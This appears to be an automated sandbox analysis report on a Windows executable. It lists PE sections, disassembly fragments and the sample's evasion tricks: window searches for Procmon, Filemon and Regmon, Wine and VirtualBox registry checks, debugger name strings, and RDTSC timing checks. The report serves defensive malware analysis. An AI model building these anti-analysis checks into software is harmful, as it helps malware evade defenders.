Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: FIyDwZM4OR.exeStatic PE information: real checksum: 0x44fa66 should be: 0x44af86
Source: FIyDwZM4OR.exeStatic PE information: section name:
Source: FIyDwZM4OR.exeStatic PE information: section name: .idata
Source: FIyDwZM4OR.exeStatic PE information: section name:
Source: FIyDwZM4OR.exeStatic PE information: section name: eqinbttk
Source: FIyDwZM4OR.exeStatic PE information: section name: yeuqavua
Source: FIyDwZM4OR.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009CC399 push eax; ret 0_3_009CC3A1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009CC399 push eax; ret 0_3_009CC3A1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009CC399 push eax; ret 0_3_009CC3A1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009CC399 push eax; ret 0_3_009CC3A1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009CC399 push eax; ret 0_3_009CC3A1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009CC399 push eax; ret 0_3_009CC3A1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009CC399 push eax; ret 0_3_009CC3A1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009CC399 push eax; ret 0_3_009CC3A1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: FIyDwZM4OR.exeStatic PE information: section name: eqinbttk entropy: 7.954236983875095

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E5010 second address: 16E5015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E414C second address: 16E4158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E42A1 second address: 16E42EE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEA75194B4Ch 0x00000008 push ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FEA75194B50h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FEA75194B54h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e jmp 00007FEA75194B4Fh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E42EE second address: 16E42F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E445E second address: 16E4462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E4625 second address: 16E465E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F79h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FEA75199F71h 0x00000010 popad 0x00000011 jnp 00007FEA75199F6Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E708E second address: 16E70D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add ecx, 2EA81F3Eh 0x00000012 push 00000000h 0x00000014 push C7C3CDCCh 0x00000019 jl 00007FEA75194B63h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FEA75194B55h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E70D8 second address: 16E7137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 383C32B4h 0x0000000d sub edx, dword ptr [ebp+122D3745h] 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FEA75199F68h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov esi, dword ptr [ebp+122D3292h] 0x00000035 push 00000000h 0x00000037 mov ecx, ebx 0x00000039 push 00000003h 0x0000003b jng 00007FEA75199F66h 0x00000041 push DEAC6EB1h 0x00000046 pushad 0x00000047 jns 00007FEA75199F6Ch 0x0000004d push eax 0x0000004e push edx 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E7316 second address: 16E732F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B54h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E73DD second address: 16E73E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E73E1 second address: 16E73E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E73E7 second address: 16E7404 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEA75199F68h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA75199F6Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E7404 second address: 16E740A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E740A second address: 16E740E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16E740E second address: 16E7412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16FA242 second address: 16FA276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FEA75199F74h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16FA276 second address: 16FA27A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170902E second address: 1709042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Eh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1709042 second address: 1709051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1709051 second address: 1709057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1709057 second address: 170905C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1706FFC second address: 1707000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707000 second address: 170700C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEA75194B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707176 second address: 170719C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FEA75199F76h 0x0000000c pushad 0x0000000d jl 00007FEA75199F66h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170719C second address: 17071A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707454 second address: 170745F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 js 00007FEA75199F66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17079F1 second address: 17079F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17079F7 second address: 17079FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17079FC second address: 1707A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEA75194B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707A06 second address: 1707A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707A0A second address: 1707A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEA75194B56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707B5D second address: 1707B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707B62 second address: 1707B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707E56 second address: 1707E7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FEA75199F66h 0x00000009 jmp 00007FEA75199F75h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707E7E second address: 1707E9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007FEA75194B46h 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707E9C second address: 1707EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1707EA0 second address: 1707EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17080FB second address: 17080FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170825F second address: 1708265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170876B second address: 170877A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170891A second address: 1708920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1708920 second address: 1708939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1708A88 second address: 1708A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B53h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1708ED2 second address: 1708ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1708ED6 second address: 1708EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FEA75194B46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170AD5B second address: 170AD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170AD5F second address: 170AD8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA75194B56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170BDB8 second address: 170BDC2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA75199F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170BF62 second address: 170BF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEA75194B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170D099 second address: 170D0AD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA75199F66h 0x00000008 jp 00007FEA75199F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170D0AD second address: 170D0B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170D0B3 second address: 170D0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170D0B9 second address: 170D0C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170E779 second address: 170E77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 170E77D second address: 170E783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1712A0F second address: 1712A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17165AC second address: 17165BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 ja 00007FEA75194B48h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1716D31 second address: 1716D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F77h 0x00000008 jnl 00007FEA75199F66h 0x0000000e jns 00007FEA75199F66h 0x00000014 popad 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1716EDF second address: 1716EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1716EE3 second address: 1716EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1717EFF second address: 1717F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1717F13 second address: 1717F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1717F24 second address: 1717F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1717F29 second address: 1717F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1718075 second address: 1718079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1718079 second address: 171807F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171807F second address: 1718084 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 171821B second address: 1718232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F73h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1718232 second address: 171824A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FEA75194B54h 0x0000000f pushad 0x00000010 jl 00007FEA75194B46h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
